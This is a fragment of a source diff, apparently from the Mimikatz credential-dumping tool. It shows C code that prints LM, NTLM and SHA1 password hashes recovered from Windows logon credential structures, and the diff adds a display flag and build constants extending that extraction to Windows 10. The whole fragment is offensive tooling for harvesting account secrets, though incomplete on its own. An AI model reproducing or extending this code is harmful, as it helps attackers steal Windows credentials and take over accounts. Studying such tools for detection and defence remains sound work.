dprintf("\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2, pPrimaryCreds10->isUnk3, pPrimaryCreds10->isUnk4);
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
{
|
||||
dprintf("\n\t * LM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isNtOwfPassword)
|
||||
{
|
||||
dprintf("\n\t * NTLM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isShaOwPassword)
|
||||
{
|
||||
dprintf("\n\t * SHA1 : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
dprintf("\n\t * unknow : ");
|
||||
for(i = 0; !isNull && (i < 128); i++)
|
||||
isNull |= !pPrimaryCreds10->UnkStruct[i];
|
||||
if(isNull)
|
||||
dprintf("[0..0]");
|
||||
else
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
|
||||
|
|
|
|||
|
|
@ -16,7 +16,8 @@ USHORT NtBuildNumber;
|
|||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL 0x08000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY 0x01000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x03000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST 0x00200000
|
||||
|
|
@ -63,10 +64,13 @@ VOID kuhl_m_sekurlsa_genericKeyOutput(struct _MARSHALL_KEY * key, PVOID * dirtyB
|
|||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
#define KULL_M_WIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_BUILD_10b 9879
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
#define KULL_M_WIN_MIN_BUILD_VISTA 6000
|
||||
#define KULL_M_WIN_MIN_BUILD_7 7000
|
||||
#define KULL_M_WIN_MIN_BUILD_8 8000
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
#define KULL_M_WIN_MIN_BUILD_10 9800
|
||||
Loading…
Reference in New Issue